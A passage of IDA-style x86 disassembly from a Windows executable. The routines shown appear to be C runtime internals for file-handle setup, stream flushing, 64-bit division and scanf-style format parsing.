mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_408B4F
; ---------------------------------------------------------------------------
loc_408B42: ; CODE XREF: sub_408ACB+55j
; sub_408ACB+62j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_408B4F: ; CODE XREF: sub_408ACB+75j
or dword ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_408B5D: ; CODE XREF: sub_408ACB+15j
; sub_408ACB+31j ...
xor eax, eax
pop esi
retn
sub_408ACB endp
; =============== S U B R O U T I N E =======================================
sub_408B61 proc near ; CODE XREF: sub_4035D3+128p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_408B8F
push esi
mov esi, [esp+4+arg_4]
test word ptr [esi+0Ch], 1000h
jz short loc_408B8E
push esi
call sub_408F8A
and dword ptr [esi+0Ch], 0FFFFEEFFh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_408B8E: ; CODE XREF: sub_408B61+12j
pop esi
locret_408B8F: ; CODE XREF: sub_408B61+5j
retn
sub_408B61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B90 proc near ; CODE XREF: sub_4044D2-E4p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_421898
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call ds:off_41D1A8
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 28h
push 20h
pop esi
push esi
call sub_407B2A
pop ecx
pop ecx
cmp eax, edi
jz loc_408DC7
mov dword_435820, eax
mov dword_435808, esi
lea ecx, [eax+500h]
jmp short loc_408C03
; ---------------------------------------------------------------------------
loc_408BDA: ; CODE XREF: sub_408B90+75j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov ecx, dword_435820
add ecx, 500h
loc_408C03: ; CODE XREF: sub_408B90+48j
cmp eax, ecx
jb short loc_408BDA
cmp [ebp+var_32], di
jz loc_408D0E
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_408D0E
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_408C32
mov edi, eax
loc_408C32: ; CODE XREF: sub_408B90+9Ej
xor esi, esi
inc esi
jmp short loc_408C89
; ---------------------------------------------------------------------------
loc_408C37: ; CODE XREF: sub_408B90+FFj
push 28h
push 20h
call sub_407B2A
pop ecx
pop ecx
test eax, eax
jz short loc_408C93
lea ecx, ds:435820h[esi*4]
mov [ecx], eax
add dword_435808, 20h
lea edx, [eax+500h]
jmp short loc_408C84
; ---------------------------------------------------------------------------
loc_408C5E: ; CODE XREF: sub_408B90+F6j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov edx, [ecx]
add edx, 500h
loc_408C84: ; CODE XREF: sub_408B90+CCj
cmp eax, edx
jb short loc_408C5E
inc esi
loc_408C89: ; CODE XREF: sub_408B90+A5j
cmp dword_435808, edi
jl short loc_408C37
jmp short loc_408C99
; ---------------------------------------------------------------------------
loc_408C93: ; CODE XREF: sub_408B90+B4j
mov edi, dword_435808
loc_408C99: ; CODE XREF: sub_408B90+101j
and [ebp+var_20], 0
test edi, edi
jle short loc_408D0E
loc_408CA1: ; CODE XREF: sub_408B90+17Cj
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_408D01
cmp ecx, 0FFFFFFFEh
jz short loc_408D01
mov al, [ebx]
test al, 1
jz short loc_408D01
test al, 8
jnz short loc_408CC5
push ecx
call ds:dword_41D144 ; GetFileType
test eax, eax
jz short loc_408D01
loc_408CC5: ; CODE XREF: sub_408B90+128j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 28h
add esi, dword_435820[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
jz loc_408DC7
inc dword ptr [esi+8]
loc_408D01: ; CODE XREF: sub_408B90+119j
; sub_408B90+11Ej ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_408CA1
loc_408D0E: ; CODE XREF: sub_408B90+7Bj
; sub_408B90+86j ...
xor ebx, ebx
loc_408D10: ; CODE XREF: sub_408B90+213j
mov esi, ebx
imul esi, 28h
add esi, dword_435820
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_408D2D
cmp eax, 0FFFFFFFEh
jz short loc_408D2D
or byte ptr [esi+4], 80h
jmp short loc_408D9F
; ---------------------------------------------------------------------------
loc_408D2D: ; CODE XREF: sub_408B90+190j
; sub_408B90+195j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_408D3A
push 0FFFFFFF6h
pop eax
jmp short loc_408D44
; ---------------------------------------------------------------------------
loc_408D3A: ; CODE XREF: sub_408B90+1A3j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_408D44: ; CODE XREF: sub_408B90+1A8j
push eax
call ds:dword_41D148 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_408D95
test edi, edi
jz short loc_408D95
push edi
call ds:dword_41D144 ; GetFileType
test eax, eax
jz short loc_408D95
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_408D73
or byte ptr [esi+4], 40h
jmp short loc_408D7C
; ---------------------------------------------------------------------------
loc_408D73: ; CODE XREF: sub_408B90+1DBj
cmp eax, 3
jnz short loc_408D7C
or byte ptr [esi+4], 8
loc_408D7C: ; CODE XREF: sub_408B90+1E1j
; sub_408B90+1E6j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
jz short loc_408DC7
inc dword ptr [esi+8]
jmp short loc_408D9F
; ---------------------------------------------------------------------------
loc_408D95: ; CODE XREF: sub_408B90+1C0j
; sub_408B90+1C4j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_408D9F: ; CODE XREF: sub_408B90+19Bj
; sub_408B90+203j
inc ebx
cmp ebx, 3
jl loc_408D10
push dword_435808
call ds:dword_41D14C ; LockResource
xor eax, eax
jmp short loc_408DCA
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_408DC7: ; CODE XREF: sub_408B90+31j
; sub_408B90+168j ...
or eax, 0FFFFFFFFh
loc_408DCA: ; CODE XREF: sub_408B90+227j
call __SEH_epilog4
retn
sub_408B90 endp
; =============== S U B R O U T I N E =======================================
sub_408DD0 proc near ; CODE XREF: sub_4035D3+63p
; sub_4035D3+6Fp ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_408DF8
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408DF8: ; CODE XREF: sub_408DD0+9j
mov eax, [eax+10h]
pop esi
retn
sub_408DD0 endp
; =============== S U B R O U T I N E =======================================
sub_408DFD proc near ; CODE XREF: sub_408E91+94p
; sub_40E422+340p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40F12D
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408E5C
cmp esi, 1
mov eax, dword_435820
jnz short loc_408E1F
test byte ptr [eax+54h], 1
jnz short loc_408E2A
loc_408E1F: ; CODE XREF: sub_408DFD+1Aj
cmp esi, 2
jnz short loc_408E40
test byte ptr [eax+2Ch], 1
jz short loc_408E40
loc_408E2A: ; CODE XREF: sub_408DFD+20j
push 2
call sub_40F12D
push 1
mov edi, eax
call sub_40F12D
cmp eax, edi
pop ecx
pop ecx
jz short loc_408E5C
loc_408E40: ; CODE XREF: sub_408DFD+25j
; sub_408DFD+2Bj
push esi
call sub_40F12D
pop ecx
push eax
call ds:off_41D0D8
test eax, eax
jnz short loc_408E5C
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_408E5E
; ---------------------------------------------------------------------------
loc_408E5C: ; CODE XREF: sub_408DFD+10j
; sub_408DFD+41j ...
xor edi, edi
loc_408E5E: ; CODE XREF: sub_408DFD+5Dj
push esi
call sub_40F0AC
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
test edi, edi
mov eax, dword_435820[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_408E8C
push edi
call sub_405BA9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_408E8E
; ---------------------------------------------------------------------------
loc_408E8C: ; CODE XREF: sub_408DFD+81j
xor eax, eax
loc_408E8E: ; CODE XREF: sub_408DFD+8Dj
pop edi
pop esi
retn
sub_408DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E91 proc near ; CODE XREF: sub_40381D+48p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_4218B8
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_408EC0
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
loc_408EB8: ; CODE XREF: sub_408E91+5Cj
or eax, 0FFFFFFFFh
jmp loc_408F4E
; ---------------------------------------------------------------------------
loc_408EC0: ; CODE XREF: sub_408E91+12j
xor edi, edi
cmp eax, edi
jl short loc_408ECE
cmp eax, dword_435808
jb short loc_408EEF
loc_408ECE: ; CODE XREF: sub_408E91+33j
; sub_408E91+7Cj
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
jmp short loc_408EB8
; ---------------------------------------------------------------------------
loc_408EEF: ; CODE XREF: sub_408E91+3Bj
mov ecx, eax
sar ecx, 5
lea ebx, ds:435820h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_408ECE
push eax
call sub_40F19E
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_408F30
push [ebp+arg_0]
call sub_408DFD
pop ecx
mov [ebp+var_1C], eax
jmp short loc_408F3F
; ---------------------------------------------------------------------------
loc_408F30: ; CODE XREF: sub_408E91+8Fj
call sub_405B83
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_408F3F: ; CODE XREF: sub_408E91+9Dj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408F54
mov eax, [ebp+var_1C]
loc_408F4E: ; CODE XREF: sub_408E91+2Aj
call __SEH_epilog4
retn
sub_408E91 endp
; =============== S U B R O U T I N E =======================================
sub_408F54 proc near ; CODE XREF: sub_408E91+B5p
; DATA XREF: fabskl8p:004218D0o
push dword ptr [ebp+8]
call sub_40F23E
pop ecx
retn
sub_408F54 endp
; =============== S U B R O U T I N E =======================================
sub_408F5E proc near ; CODE XREF: sub_40381D+3Cp
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_408F88
test al, 8
jz short loc_408F88
push dword ptr [esi+8]
call sub_4039CF
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_408F88: ; CODE XREF: sub_408F5E+Aj
; sub_408F5E+Ej
pop esi
retn
sub_408F5E endp
; =============== S U B R O U T I N E =======================================
sub_408F8A proc near ; CODE XREF: sub_40381D+34p
; sub_408B61+15p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_408FDE
test ax, 108h
jz short loc_408FDE
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_408FDD
push edi
push eax
push esi
call sub_408DD0
pop ecx
push eax
call sub_40D7D0
add esp, 0Ch
cmp eax, edi
jnz short loc_408FD6
mov eax, [esi+0Ch]
test al, al
jns short loc_408FDD
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_408FDD
; ---------------------------------------------------------------------------
loc_408FD6: ; CODE XREF: sub_408F8A+3Bj
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_408FDD: ; CODE XREF: sub_408F8A+25j
; sub_408F8A+42j ...
pop edi
loc_408FDE: ; CODE XREF: sub_408F8A+13j
; sub_408F8A+19j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_408F8A endp
; =============== S U B R O U T I N E =======================================
sub_408FEC proc near ; CODE XREF: sub_40902E+69p
; sub_40902E+84p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408FFE
push esi
call sub_40902E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408FFE: ; CODE XREF: sub_408FEC+7j
push esi
call sub_408F8A
test eax, eax
pop ecx
jz short loc_40900E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40900E: ; CODE XREF: sub_408FEC+1Bj
test word ptr [esi+0Ch], 4000h
jz short loc_40902A
push esi
call sub_408DD0
push eax
call sub_40F3FF
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40902A: ; CODE XREF: sub_408FEC+28j
xor eax, eax
pop esi
retn
sub_408FEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40902E proc near ; CODE XREF: sub_408FEC+Ap
; sub_409108+2p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004090E1 SIZE 0000001E BYTES
push 14h
push offset dword_4218D8
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_40904F: ; CODE XREF: sub_40902E+9Bj
mov [ebp+var_20], esi
cmp esi, dword_436940
jge loc_4090E1
mov eax, dword_435920
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_4090C8
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_4090C8
push eax
push esi
call sub_40853A
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_435920
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4090C0
cmp [ebp+arg_0], edx
jnz short loc_4090A7
push eax
call sub_408FEC
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4090C0
inc [ebp+var_1C]
jmp short loc_4090C0
; ---------------------------------------------------------------------------
loc_4090A7: ; CODE XREF: sub_40902E+66j
cmp [ebp+arg_0], edi
jnz short loc_4090C0
test cl, 2
jz short loc_4090C0
push eax
call sub_408FEC
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_4090C0
or [ebp+var_24], eax
loc_4090C0: ; CODE XREF: sub_40902E+61j
; sub_40902E+72j ...
mov [ebp+ms_exc.disabled], edi
call sub_4090D0
loc_4090C8: ; CODE XREF: sub_40902E+3Aj
; sub_40902E+42j
inc esi
jmp short loc_40904F
sub_40902E endp
; ---------------------------------------------------------------------------
xor edi, edi
mov esi, [ebp-20h]
; =============== S U B R O U T I N E =======================================
sub_4090D0 proc near ; CODE XREF: sub_40902E+95p
mov eax, dword_435920
push dword ptr [eax+esi*4]
push esi
call sub_40858C
pop ecx
pop ecx
retn
sub_4090D0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40902E
loc_4090E1: ; CODE XREF: sub_40902E+2Aj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4090FF
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_4090F9
mov eax, [ebp+var_24]
loc_4090F9: ; CODE XREF: sub_40902E+C6j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40902E
; =============== S U B R O U T I N E =======================================
sub_4090FF proc near ; CODE XREF: sub_40902E+BAp
; DATA XREF: fabskl8p:004218F0o
push 1
call sub_405CCF
pop ecx
retn
sub_4090FF endp
; =============== S U B R O U T I N E =======================================
sub_409108 proc near ; CODE XREF: sub_4084EBp
push 1
call sub_40902E
pop ecx
retn
sub_409108 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409120 proc near ; CODE XREF: sub_40390C+29p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_409142
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_409183
; ---------------------------------------------------------------------------
loc_409142: ; CODE XREF: sub_409120+8j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_409150: ; CODE XREF: sub_409120+3Aj
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_409150
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_40917E
cmp edx, [esp+8+arg_4]
ja short loc_40917E
jb short loc_40917F
cmp eax, [esp+8+arg_0]
jbe short loc_40917F
loc_40917E: ; CODE XREF: sub_409120+4Ej
; sub_409120+54j
dec esi
loc_40917F: ; CODE XREF: sub_409120+56j
; sub_409120+5Cj
xor edx, edx
mov eax, esi
loc_409183: ; CODE XREF: sub_409120+20j
pop esi
pop ebx
retn 10h
sub_409120 endp
; =============== S U B R O U T I N E =======================================
sub_409188 proc near ; CODE XREF: sub_409217+3CDp
; sub_409217+447p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esi]
cmp [esp+arg_0], eax
jnz short loc_4091D8
mov ecx, [edi]
cmp ecx, [esp+arg_4]
push 2
push eax
jnz short loc_4091C7
call sub_407B2A
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jnz short loc_4091AB
loc_4091A8: ; CODE XREF: sub_409188+4Aj
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4091AB: ; CODE XREF: sub_409188+1Ej
mov eax, [esp+arg_8]
mov dword ptr [eax], 1
push dword ptr [esi]
push [esp+4+arg_4]
push dword ptr [edi]
call sub_407FA0
add esp, 0Ch
jmp short loc_4091D6
; ---------------------------------------------------------------------------
loc_4091C7: ; CODE XREF: sub_409188+11j
push ecx
call sub_407BBD
add esp, 0Ch
test eax, eax
jz short loc_4091A8
mov [edi], eax
loc_4091D6: ; CODE XREF: sub_409188+3Dj
shl dword ptr [esi], 1
loc_4091D8: ; CODE XREF: sub_409188+6j
xor eax, eax
inc eax
retn
sub_409188 endp
; =============== S U B R O U T I N E =======================================
sub_4091DC proc near ; CODE XREF: sub_4091F2+7p
; sub_409217+2E1p ...
dec dword ptr [edx+4]
js short loc_4091EA
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_4091EA: ; CODE XREF: sub_4091DC+3j
push edx
call sub_40A03D
pop ecx
retn
sub_4091DC endp
; =============== S U B R O U T I N E =======================================
sub_4091F2 proc near ; CODE XREF: sub_409217+14Fp
; sub_409217+2D3p
arg_0 = dword ptr 4
push ebx
loc_4091F3: ; CODE XREF: sub_4091F2+1Fj
mov edx, [esp+4+arg_0]
inc dword ptr [esi]
call sub_4091DC
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_409213
movzx eax, bl
push eax
call sub_40F626
test eax, eax
pop ecx
jnz short loc_4091F3
loc_409213: ; CODE XREF: sub_4091F2+11j
mov eax, ebx
pop ebx
retn
sub_4091F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=18Ch
sub_409217 proc near ; DATA XREF: sub_4039B0+10o
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = byte ptr -1DCh
var_1DB = byte ptr -1DBh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C9 = byte ptr -1C9h
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_1A3 = byte ptr -1A3h
var_1A2 = byte ptr -1A2h
var_1A1 = byte ptr -1A1h
var_1A0 = dword ptr -1A0h
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_198 = dword ptr -198h
var_191 = byte ptr -191h
var_190 = dword ptr -190h
var_189 = byte ptr -189h
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_24 = byte ptr -24h
var_19 = byte ptr -19h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-18Ch]
sub esp, 1FCh
mov eax, dword_423064
xor eax, ebp
mov [ebp+18Ch+var_4], eax
mov eax, [ebp+18Ch+arg_C]
push ebx
push esi
mov esi, [ebp+18Ch+arg_0]
xor ebx, ebx
push edi
mov edi, [ebp+18Ch+arg_4]
cmp edi, ebx
mov [ebp+18Ch+var_1E4], eax
lea eax, [ebp+18Ch+var_184]
mov [ebp+18Ch+var_1A0], esi
mov [ebp+18Ch+var_1B4], edi
mov [ebp+18Ch+var_1B0], eax
mov [ebp+18Ch+var_1D8], 15Eh
mov [ebp+18Ch+var_1D0], ebx
mov [ebp+18Ch+var_1E8], ebx
mov [ebp+18Ch+var_190], ebx
jnz short loc_40928C
loc_40926C: ; CODE XREF: sub_409217+77j
; sub_409217+C6j ...
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_409E4C
; ---------------------------------------------------------------------------
loc_40928C: ; CODE XREF: sub_409217+53j
cmp esi, ebx
jz short loc_40926C
test byte ptr [esi+0Ch], 40h
jnz loc_40932B
push esi
call sub_408DD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4092D4
push esi
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_4092D4
push esi
call sub_408DD0
sar eax, 5
push esi
lea edi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_4092D9
; ---------------------------------------------------------------------------
loc_4092D4: ; CODE XREF: sub_409217+8Dj
; sub_409217+99j
mov eax, offset dword_423BD0
loc_4092D9: ; CODE XREF: sub_409217+BBj
test byte ptr [eax+24h], 7Fh
jnz short loc_40926C
push esi
call sub_408DD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_409319
push esi
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_409319
push esi
call sub_408DD0
sar eax, 5
push esi
lea edi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40931E
; ---------------------------------------------------------------------------
loc_409319: ; CODE XREF: sub_409217+D2j
; sub_409217+DEj
mov eax, offset dword_423BD0
loc_40931E: ; CODE XREF: sub_409217+100j
test byte ptr [eax+24h], 80h
jnz loc_40926C
mov edi, [ebp+18Ch+var_1B4]
loc_40932B: ; CODE XREF: sub_409217+7Dj
push [ebp+18Ch+arg_8]
lea ecx, [ebp+18Ch+var_1F8]
call sub_402AEB
mov al, [edi]
test al, al
mov [ebp+18Ch+var_1A1], bl
mov [ebp+18Ch+var_188], ebx
mov [ebp+18Ch+var_1C8], ebx
jz loc_409E3C
mov edi, [ebp+18Ch+var_1B4]
loc_40934F: ; CODE XREF: sub_409217+BC2j
movzx eax, al
push eax
call sub_40F626
test eax, eax
pop ecx
jz short loc_409390
push [ebp+18Ch+var_1A0]
dec [ebp+18Ch+var_188]
lea esi, [ebp+18Ch+var_188]
call sub_4091F2
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40937C
push [ebp+18Ch+var_1A0]
push eax
call sub_40F64F
pop ecx
pop ecx
loc_40937C: ; CODE XREF: sub_409217+158j
; sub_409217+172j
inc edi
movzx eax, byte ptr [edi]
push eax
call sub_40F626
test eax, eax
pop ecx
jnz short loc_40937C
jmp loc_409DD5
; ---------------------------------------------------------------------------
loc_409390: ; CODE XREF: sub_409217+144j
cmp byte ptr [edi], 25h
jnz loc_409D7D
xor eax, eax
mov [ebp+18Ch+var_1E0], eax
mov [ebp+18Ch+var_1C9], al
mov [ebp+18Ch+var_1A8], eax
mov [ebp+18Ch+var_1B8], eax
mov [ebp+18Ch+var_198], eax
mov [ebp+18Ch+var_1A4], al
mov [ebp+18Ch+var_1A3], al
mov [ebp+18Ch+var_199], al
mov [ebp+18Ch+var_189], al
mov [ebp+18Ch+var_1A2], al
mov [ebp+18Ch+var_191], al
mov [ebp+18Ch+var_19A], 1
mov [ebp+18Ch+var_1D4], eax
xor esi, esi
loc_4093C5: ; CODE XREF: sub_409217+279j
inc edi
movzx ebx, byte ptr [edi]
movzx eax, bl
push eax
call sub_40F52F
test eax, eax
pop ecx
jz short loc_4093EC
mov eax, [ebp+18Ch+var_198]
inc [ebp+18Ch+var_1B8]
imul eax, 0Ah
lea eax, [eax+ebx-30h]
mov [ebp+18Ch+var_198], eax
jmp loc_40948C
; ---------------------------------------------------------------------------
loc_4093EC: ; CODE XREF: sub_409217+1BEj
cmp ebx, 4Eh
jg short loc_409462
jz loc_40948C
cmp ebx, 2Ah
jz short loc_40945D
cmp ebx, 46h
jz loc_40948C
cmp ebx, 49h
jz short loc_409414
cmp ebx, 4Ch
jnz short loc_409471
inc [ebp+18Ch+var_19A]
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_409414: ; CODE XREF: sub_409217+1F1j
mov cl, [edi+1]
cmp cl, 36h
jnz short loc_409431
lea eax, [edi+2]
cmp byte ptr [eax], 34h
jnz short loc_409431
loc_409424: ; CODE XREF: sub_409217+265j
inc [ebp+18Ch+var_1D4]
mov edi, eax
mov [ebp+18Ch+var_1C0], esi
mov [ebp+18Ch+var_1BC], esi
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_409217+203j
; sub_409217+20Bj
cmp cl, 33h
jnz short loc_409442
lea eax, [edi+2]
cmp byte ptr [eax], 32h
jnz short loc_409442
mov edi, eax
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_409442: ; CODE XREF: sub_409217+21Dj
; sub_409217+225j
cmp cl, 64h
jz short loc_40948C
cmp cl, 69h
jz short loc_40948C
cmp cl, 6Fh
jz short loc_40948C
cmp cl, 78h
jz short loc_40948C
cmp cl, 58h
jnz short loc_409471
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_40945D: ; CODE XREF: sub_409217+1E3j
inc [ebp+18Ch+var_199]
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_409462: ; CODE XREF: sub_409217+1D8j
cmp ebx, 68h
jz short loc_409486
cmp ebx, 6Ch
jz short loc_409476
cmp ebx, 77h
jz short loc_409481
loc_409471: ; CODE XREF: sub_409217+1F6j
; sub_409217+242j
inc [ebp+18Ch+var_189]
jmp short loc_40948C
; ---------------------------------------------------------------------------
loc_409476: ; CODE XREF: sub_409217+253j
lea eax, [edi+1]
cmp byte ptr [eax], 6Ch
jz short loc_409424
inc [ebp+18Ch+var_19A]
loc_409481: ; CODE XREF: sub_409217+258j
inc [ebp+18Ch+var_191]
jmp short loc_40948C
; ---------------------------------------------------------------------------
